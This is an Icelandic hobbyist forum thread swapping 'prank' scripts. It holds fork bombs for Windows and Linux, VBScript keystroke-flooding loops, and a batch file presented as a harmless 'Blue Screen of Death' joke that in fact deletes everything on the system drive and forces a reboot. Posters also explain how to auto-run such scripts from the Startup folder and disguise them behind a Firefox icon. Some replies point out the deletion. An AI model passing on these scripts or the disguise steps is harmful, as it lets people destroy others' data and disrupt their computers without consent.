Skemmtilegir hrekkir (kóðar)

Allt utan efnis
Skjámynd

Höfundur
BjarkiB
Of mikill frítími
Póstar: 1946
Skráði sig: Fim 26. Nóv 2009 19:02
Staðsetning: C:\Akureyri
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af BjarkiB »

dori skrifaði:Coldcut sagði basically það sama og stendur á Wikipedia nema í styttra máli og ekki með dæmum. Ef þú vilt endilega vera sniðugur án þess að vita hvað þú ert að gera skrifaðu þá bara í cmd:

Kóði: Velja allt

%0|%0
eða ef þú skyldir vera með linux

Kóði: Velja allt

:(){ :|: & }; :
Já er að fatta þetta núna, var ekki allveg að skilja þetta. Hélt að hann væri að meina að tölvan myndi ekki crasha heldur bara verð hægvirk.

coldcut
Vaktari
Póstar: 2192
Skráði sig: Mið 21. Nóv 2007 02:25
Staðsetning: /dev/random
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af coldcut »

Tiesto skrifaði:
dori skrifaði:Coldcut sagði basically það sama og stendur á Wikipedia nema í styttra máli og ekki með dæmum. Ef þú vilt endilega vera sniðugur án þess að vita hvað þú ert að gera skrifaðu þá bara í cmd:

Kóði: Velja allt

%0|%0
eða ef þú skyldir vera með linux

Kóði: Velja allt

:(){ :|: & }; :
Já er að fatta þetta núna, var ekki allveg að skilja þetta. Hélt að hann væri að meina að tölvan myndi ekki crasha heldur bara verð hægvirk.
Crashar kannski ekki en það er einfaldast að reboota bara. Mæli ekki með því að gera þetta við reiðar persónur!

zdndz
Gúrú
Póstar: 550
Skráði sig: Sun 13. Apr 2008 14:47
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af zdndz »

Er ekki til einhver kóði þannig að ýtt er endalaust á spacebar takkann?

annars hvernig breyti ég þannig að tegundinn af file-num verði .vbs en ekki .txt
ef ég rename-a bara þá verður file-inn bara hrekkur.vbs.txt
er að nota W7 ef það skiptir máli
Intel E5200 @ 2.5 GHz | Radeon HD 4850 | Corsair 2x2 GB RAM 1066 MHz | 480 W aflgjafi | Móðurborð Micro-Star P43 NEO | 500GB Samsung | Windows 7 / Ubuntu
Ruddaleg túpuskjátölva!
Skjámynd

Lexxinn
Kerfisstjóri
Póstar: 1288
Skráði sig: Sun 22. Nóv 2009 12:26
Staðsetning: Júpíter
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af Lexxinn »

zdndz skrifaði:Er ekki til einhver kóði þannig að ýtt er endalaust á spacebar takkann?

annars hvernig breyti ég þannig að tegundinn af file-num verði .vbs en ekki .txt
ef ég rename-a bara þá verður file-inn bara hrekkur.vbs.txt
er að nota W7 ef það skiptir máli
Þegar þú ert að gera nýjan file læturu hann heita t.d. "Hrekkur.vbs" hægri smellir ekki á desktop og new heldur opnar í start menu.

zdndz
Gúrú
Póstar: 550
Skráði sig: Sun 13. Apr 2008 14:47
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af zdndz »

Kuldabolinn skrifaði:já oks en ég fann nokkra ;)

Sama og þetta með Caps Lock nema bara þetta ýtir bara endalaust á enter

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Og þetta ýtir bara endalaust á back space takkann

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


héra getiru séð meira :P
http://www.knowledgesutra.com/forums/to ... vbs-codes/" onclick="window.open(this.href);return false;
þessi hérna bluscreen dúddi sem ég fann inná síðunni hérna fyrir ofan, getur hann verið hættulegur, getur hann skaðað tölvuna eitthvað?

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Intel E5200 @ 2.5 GHz | Radeon HD 4850 | Corsair 2x2 GB RAM 1066 MHz | 480 W aflgjafi | Móðurborð Micro-Star P43 NEO | 500GB Samsung | Windows 7 / Ubuntu
Ruddaleg túpuskjátölva!
Skjámynd

Höfundur
BjarkiB
Of mikill frítími
Póstar: 1946
Skráði sig: Fim 26. Nóv 2009 19:02
Staðsetning: C:\Akureyri
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af BjarkiB »

zdndz skrifaði:
Kuldabolinn skrifaði:já oks en ég fann nokkra ;)

Sama og þetta með Caps Lock nema bara þetta ýtir bara endalaust á enter

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Og þetta ýtir bara endalaust á back space takkann

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


héra getiru séð meira :P
http://www.knowledgesutra.com/forums/to ... vbs-codes/" onclick="window.open(this.href);return false;
þessi hérna bluscreen dúddi sem ég fann inná síðunni hérna fyrir ofan, getur hann verið hættulegur, getur hann skaðað tölvuna eitthvað?

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Hvað helduru?
Viðist delete-a eitthverjum systemdrive file og slekkur svo á tölvunni.

zdndz
Gúrú
Póstar: 550
Skráði sig: Sun 13. Apr 2008 14:47
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af zdndz »

Tiesto skrifaði:
zdndz skrifaði:
Kuldabolinn skrifaði:já oks en ég fann nokkra ;)

Sama og þetta með Caps Lock nema bara þetta ýtir bara endalaust á enter

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Og þetta ýtir bara endalaust á back space takkann

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


héra getiru séð meira :P
http://www.knowledgesutra.com/forums/to ... vbs-codes/" onclick="window.open(this.href);return false;
þessi hérna bluscreen dúddi sem ég fann inná síðunni hérna fyrir ofan, getur hann verið hættulegur, getur hann skaðað tölvuna eitthvað?

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Hvað helduru?
Viðist delete-a eitthverjum systemdrive file og slekkur svo á tölvunni.
aah, mín mistök, sá ekki þetta með system drive,
Intel E5200 @ 2.5 GHz | Radeon HD 4850 | Corsair 2x2 GB RAM 1066 MHz | 480 W aflgjafi | Móðurborð Micro-Star P43 NEO | 500GB Samsung | Windows 7 / Ubuntu
Ruddaleg túpuskjátölva!
Skjámynd

Klemmi
Stjórnandi
Póstar: 3981
Skráði sig: Fim 10. Apr 2003 12:16
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af Klemmi »

Sýnist hann nú bara reyna að delete-a öllu af stýrikerfisdisknum....
www.laptop.is
www.ferdaleit.is

zdndz
Gúrú
Póstar: 550
Skráði sig: Sun 13. Apr 2008 14:47
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af zdndz »

meiri spáing, er ekki hægt að að láta file-a starta sér upp við startup, væri ekki hægt að láta svona .vbs file starta sér upp við startup? hvernig er það þá gert?
Intel E5200 @ 2.5 GHz | Radeon HD 4850 | Corsair 2x2 GB RAM 1066 MHz | 480 W aflgjafi | Móðurborð Micro-Star P43 NEO | 500GB Samsung | Windows 7 / Ubuntu
Ruddaleg túpuskjátölva!
Skjámynd

Höfundur
BjarkiB
Of mikill frítími
Póstar: 1946
Skráði sig: Fim 26. Nóv 2009 19:02
Staðsetning: C:\Akureyri
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af BjarkiB »

zdndz skrifaði:meiri spáing, er ekki hægt að að láta file-a starta sér upp við startup, væri ekki hægt að láta svona .vbs file starta sér upp við startup? hvernig er það þá gert?
Jú, setur file-inn í start-up folderinn.


Windows 7 and Vista

c:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Windows XP

c:\Documents and Settings\[username]\Start Menu\Programs\Startup

zdndz
Gúrú
Póstar: 550
Skráði sig: Sun 13. Apr 2008 14:47
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af zdndz »

Tiesto skrifaði:
zdndz skrifaði:meiri spáing, er ekki hægt að að láta file-a starta sér upp við startup, væri ekki hægt að láta svona .vbs file starta sér upp við startup? hvernig er það þá gert?
Jú, setur file-inn í start-up folderinn.


Windows 7 and Vista

c:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Windows XP

c:\Documents and Settings\[username]\Start Menu\Programs\Startup

takk :)
Intel E5200 @ 2.5 GHz | Radeon HD 4850 | Corsair 2x2 GB RAM 1066 MHz | 480 W aflgjafi | Móðurborð Micro-Star P43 NEO | 500GB Samsung | Windows 7 / Ubuntu
Ruddaleg túpuskjátölva!

ViktorS
Tölvutryllir
Póstar: 629
Skráði sig: Mið 24. Feb 2010 00:12
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af ViktorS »

HAHA vinur minn var alltaf að gera þetta í skólanum.. linkar á bug síður og fl.

já og hvernig breytir maður iconinu á þessu í t.d. firefox icon?

biturk
Kóngur
Póstar: 4431
Skráði sig: Mið 01. Apr 2009 17:08
Staðsetning: Akureyri
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af biturk »

Klemmi skrifaði:Sýnist hann nú bara reyna að delete-a öllu af stýrikerfisdisknum....

hversu margir ætli hafa prófað þetta :lol:
ef ég spyr spurninga vil ég fá það í þráðinn EKKI í pm!! pm með hótunum, svör við spurningum og fleiru eru án tafar birt í viðeigandi þráð.
Sýnum skynsemi og skrifum undir á móti esb tíma og peningasóun, farðu á www.skynsemi.is og skráðu þig!
Skjámynd

Höfundur
BjarkiB
Of mikill frítími
Póstar: 1946
Skráði sig: Fim 26. Nóv 2009 19:02
Staðsetning: C:\Akureyri
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af BjarkiB »

ViktorS skrifaði:HAHA vinur minn var alltaf að gera þetta í skólanum.. linkar á bug síður og fl.

já og hvernig breytir maður iconinu á þessu í t.d. firefox icon?
Best að búa bara til shortcut og fela hinn file-inn.
Hægri klikkar á skjáborðið>New>Shortcut>Finnur file-inn> Nefnir shortcuttið Mozilla Firefox> Done
Svo til að breyta iconinu þá ýturu bara á properties á shortcuttinu og "Change Icon" og ferð í mozilla firefox install möppuna og ættir að finna iconið þar.
Skjámynd

gardar
Besserwisser
Póstar: 3111
Skráði sig: Mán 11. Ágú 2008 02:49
Staðsetning: ::1
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af gardar »

ViktorS skrifaði:HAHA vinur minn var alltaf að gera þetta í skólanum.. linkar á bug síður og fl.

já og hvernig breytir maður iconinu á þessu í t.d. firefox icon?

já svona síður?
https://bugs.launchpad.net/" onclick="window.open(this.href);return false;
https://bugzilla.mozilla.org/" onclick="window.open(this.href);return false;
https://bugs.archlinux.org/" onclick="window.open(this.href);return false;
Skjámynd

Frost
Besserwisser
Póstar: 3105
Skráði sig: Sun 16. Ágú 2009 02:30
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af Frost »

gardar skrifaði:
ViktorS skrifaði:HAHA vinur minn var alltaf að gera þetta í skólanum.. linkar á bug síður og fl.

já og hvernig breytir maður iconinu á þessu í t.d. firefox icon?

já svona síður?
https://bugs.launchpad.net/" onclick="window.open(this.href);return false;
https://bugzilla.mozilla.org/" onclick="window.open(this.href);return false;
https://bugs.archlinux.org/" onclick="window.open(this.href);return false;
Hehe ég var nærrum því búinn að ýta á. Eða er kannski í lagi að ýta á þetta :?: :catgotmyballs
Tölva, 2 skjáir, Varmilo lyklaborð, þráðlaus mús og næs heyrnatól
Skjámynd

Höfundur
BjarkiB
Of mikill frítími
Póstar: 1946
Skráði sig: Fim 26. Nóv 2009 19:02
Staðsetning: C:\Akureyri
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af BjarkiB »

Frost skrifaði:
gardar skrifaði:
ViktorS skrifaði:HAHA vinur minn var alltaf að gera þetta í skólanum.. linkar á bug síður og fl.

já og hvernig breytir maður iconinu á þessu í t.d. firefox icon?

já svona síður?
https://bugs.launchpad.net/" onclick="window.open(this.href);return false;
https://bugzilla.mozilla.org/" onclick="window.open(this.href);return false;
https://bugs.archlinux.org/" onclick="window.open(this.href);return false;
Hehe ég var nærrum því búinn að ýta á. Eða er kannski í lagi að ýta á þetta :?: :catgotmyballs
Haha ertu að djóka?
Bug=Vandamál eða villur.
Þetta er hjálparsíður fyrir Firefox tld. :lol:
Skjámynd

Frost
Besserwisser
Póstar: 3105
Skráði sig: Sun 16. Ágú 2009 02:30
Staða: Ótengdur

Re: Skemmtilegir hrekkir (kóðar)

Póstur af Frost »

Tiesto skrifaði:
Frost skrifaði:
gardar skrifaði:
ViktorS skrifaði:HAHA vinur minn var alltaf að gera þetta í skólanum.. linkar á bug síður og fl.

já og hvernig breytir maður iconinu á þessu í t.d. firefox icon?

já svona síður?
https://bugs.launchpad.net/" onclick="window.open(this.href);return false;
https://bugzilla.mozilla.org/" onclick="window.open(this.href);return false;
https://bugs.archlinux.org/" onclick="window.open(this.href);return false;
Hehe ég var nærrum því búinn að ýta á. Eða er kannski í lagi að ýta á þetta :?: :catgotmyballs
Haha ertu að djóka?
Bug=Vandamál eða villur.
Þetta er hjálparsíður fyrir Firefox tld. :lol:
Hvað heldurðu að ég sé?

Allanvegna on topic.

Ég og nokkrir félagar mínir vorum á hóteli útá landi(Vorum að keppa í körfubolta). Það var tölva í móttökunni svona fyrir gesti og starfsfólk.

Við gerðum þetta með að taka screenshot af desktoppinu og svo felsa icons o.s.frv. Svo settumst við niður í matsalinn og horfðum á fólkið fríka út yfir þessu :sleezyjoe
Tölva, 2 skjáir, Varmilo lyklaborð, þráðlaus mús og næs heyrnatól
Svara